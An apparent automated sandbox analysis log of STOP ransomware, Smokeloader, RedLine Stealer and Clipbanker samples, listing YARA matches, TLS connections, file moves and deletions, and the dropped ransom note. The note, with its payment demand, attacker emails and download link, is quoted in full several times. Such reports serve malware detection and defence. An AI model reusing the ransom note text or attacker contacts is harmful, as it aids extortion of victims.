Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.253.115.138:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.207.127:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.156.20:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.105.90.131:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.6:49741 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: Yara match File source: 00000006.00000002.2358331788.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2358489940.0000000002741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2120318342.0000000000CC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2120238789.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC, 12_2_004822E0

E-Banking Fraud

barindex
Source: Yara match File source: 44.3.71C9.exe.39e0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.71C9.exe.3190e67.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.71C9.exe.30f0e67.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.71C9.exe.3a80000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.3174084489.0000000003E22000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.4516603892.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 71C9.exe PID: 6944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 71C9.exe PID: 3208, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\_README.txt Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0857PsawqSr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5 Jump to dropped file
Source: Yara match File source: Process Memory Space: DB15.exe PID: 6320, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DB15.exe PID: 4436, type: MEMORYSTR
Source: Yara match File source: 11.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.DB15.exe.28915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.DB15.exe.28415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.DB15.exe.28415a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.DB15.exe.28915a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.DB15.exe.28a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.DB15.exe.28a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DB15.exe PID: 6336, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DB15.exe PID: 7004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DB15.exe PID: 5368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DB15.exe PID: 6320, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DB15.exe PID: 5356, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DB15.exe PID: 4436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DB15.exe PID: 5988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DB15.exe PID: 6848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DB15.exe PID: 7144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DB15.exe PID: 3544, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File moved: C:\Users\user\Desktop\SQSJKEBWDT.jpg
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File deleted: C:\Users\user\Desktop\SQSJKEBWDT.jpg
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File moved: C:\Users\user\Desktop\MXPXCVPDVN.docx
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File deleted: C:\Users\user\Desktop\MXPXCVPDVN.docx
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe File moved: C:\Users\user\Desktop\SFPUSAFIOL\PWCCAWLGRE.pdf Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe File dropped: C:\Users\user\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File dropped: C:\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File dropped: C:\$WinREAgent\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File dropped: C:\$WinREAgent\Scratch\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file

System Summary

barindex
Source: 43.2.build3.exe.24115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 43.2.build3.exe.24115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 11.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 22.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 22.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.2.DB15.exe.28915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.2.DB15.exe.28915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 19.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 19.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 27.2.DB15.exe.28415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 27.2.DB15.exe.28415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 27.2.DB15.exe.28415a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 27.2.DB15.exe.28415a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 19.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 19.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.2.DB15.exe.28915a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.2.DB15.exe.28915a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 22.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 22.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 21.2.DB15.exe.28a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 21.2.DB15.exe.28a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 43.2.build3.exe.24115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 43.2.build3.exe.24115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 21.2.DB15.exe.28a15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 21.2.DB15.exe.28a15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000002.2358331788.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000000.00000002.2120177869.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.2358389618.0000000000CAD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.2358489940.0000000002741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000002B.00000002.3313329838.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000002B.00000002.3313329838.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000002C.00000002.4539281116.00000000030F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000002C.00000002.4532684195.0000000002CF4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000B.00000002.2820341095.00000000027D0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000002B.00000002.3313063118.000000000083D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000015.00000002.2970592193.0000000002708000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000023.00000002.3157028193.0000000000850000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001B.00000002.3053445351.000000000279C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
